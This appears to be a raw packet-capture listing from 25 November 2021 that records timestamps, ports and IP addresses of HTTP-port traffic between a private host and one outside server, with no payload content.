Nov 25, 2021 18:21:20.204960108 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.347692966 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.347734928 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.347927094 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.347969055 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.348006010 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.348021030 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.348077059 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.349200010 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.349323988 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.349323988 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.349373102 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.349503994 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.349555969 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.349795103 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.349869013 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.353435993 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.353483915 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.353502035 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.353527069 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.353630066 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.353773117 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.353796959 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.353821039 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.353836060 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.353852987 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.353857994 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.353930950 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.354039907 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.354151964 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.354195118 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.354274035 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.354276896 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356125116 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.356142044 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.356143951 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.356184006 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356214046 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356224060 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356236935 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356254101 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356271982 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356283903 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356302023 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356319904 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356337070 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356353998 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356374025 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.356395006 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.358879089 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358907938 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358912945 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358922958 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358926058 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358928919 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358931065 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358933926 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358937025 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.358938932 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.494379997 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.494415998 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.494430065 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.494441986 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.494604111 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.495219946 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.495248079 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.495302916 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.495352983 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.495393038 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.495490074 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.495527983 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496263027 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496323109 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496325970 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496356010 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496391058 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496421099 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496431112 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496459007 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496596098 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496629000 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496635914 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496670008 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496674061 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496706963 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.496767044 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.496799946 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.497087955 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.499896049 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.499975920 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.500000000 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.500014067 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.500015974 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.500046968 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.500121117 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.500158072 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501205921 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501235962 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501266956 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501281023 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501282930 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501301050 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501312017 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501323938 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501485109 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501513958 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501595020 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501611948 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501625061 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501633883 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501727104 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501755953 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501876116 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.501904011 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501919031 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.501998901 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.502031088 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.502046108 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.502075911 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.502077103 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.502116919 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.502640009 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.502686024 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.503058910 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.503122091 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.503149033 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.503179073 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.503190994 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.503218889 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.505165100 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.505198956 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.505260944 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.505283117 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.505309105 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.505319118 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507263899 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507319927 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507384062 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507426023 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507455111 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507493019 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507531881 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507565022 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507776022 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507817030 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507819891 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507850885 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507890940 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507914066 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.507927895 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.507942915 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.508043051 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.508078098 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.508090019 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.508121014 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.641099930 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.641144991 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.641160965 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.641241074 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.641307116 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.641453981 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.642152071 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.642187119 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.642234087 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.642251968 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.642255068 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.642292023 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.642343998 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.642388105 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644083977 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644123077 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644182920 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644200087 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644227028 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644253016 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644268990 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644285917 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644366026 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644411087 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644413948 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644450903 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644479036 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644517899 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.644582033 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.644630909 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.645730019 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.646290064 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.646344900 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.646456957 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.646501064 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.646631956 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.646672010 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.646845102 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.646888971 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.647490978 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.647551060 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.647819996 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.647881031 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.648003101 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.648042917 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.648191929 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.648233891 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.649909019 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650010109 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650042057 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650079012 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650100946 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650104046 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650120020 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650141954 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650149107 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650191069 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650199890 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650243998 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650252104 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650295019 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650300980 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650343895 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650445938 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650490999 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650537968 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650579929 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650615931 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650656939 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.650691986 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.650736094 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.651398897 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.651407003 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.651459932 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.651520014 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.651562929 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.653569937 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.653644085 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.653738976 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.653779984 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.653899908 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.653944016 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.654098988 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.654149055 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.656147957 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.656172037 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.656188965 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.656210899 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.656234980 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.656235933 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.656255960 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.656263113 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.656269073 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.656271935 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.656291008 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.787939072 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.787998915 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.788038015 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.788077116 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.788464069 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.788734913 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.788753033 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.788762093 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.788764954 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.788897038 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.788964033 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.789079905 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.789207935 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.789211988 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.790501118 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.790632010 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.790656090 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.790698051 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.790822029 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.790858030 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.791044950 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.791168928 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.791816950 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.791893005 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.791946888 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.791971922 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.792007923 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.792035103 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.792048931 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.792465925 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.792512894 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.792670012 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.792767048 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.792890072 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.792967081 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.793035030 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.793087006 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.793663025 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.793737888 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.793824911 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.793909073 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.794270992 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.794358969 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.794428110 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.794472933 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.796396971 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.796530962 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.796598911 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.796639919 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.796792030 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.796895027 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.796922922 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.796961069 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.798619986 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.798646927 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.798666954 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.798710108 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.798712969 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.798736095 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.798739910 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.798888922 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.798907995 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.798943996 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.798998117 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.799031973 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.799084902 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.799201012 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.799264908 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.799271107 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.799320936 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.799642086 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.799673080 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.799729109 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.799778938 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.799819946 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.800662994 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.800729990 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.800880909 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.800926924 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.800956964 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.800971985 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.800987005 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.802463055 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.802489042 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.802545071 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.802742004 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.802779913 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.802942038 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.802982092 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.803577900 CET	80	49167	173.232.204.89	192.168.2.22
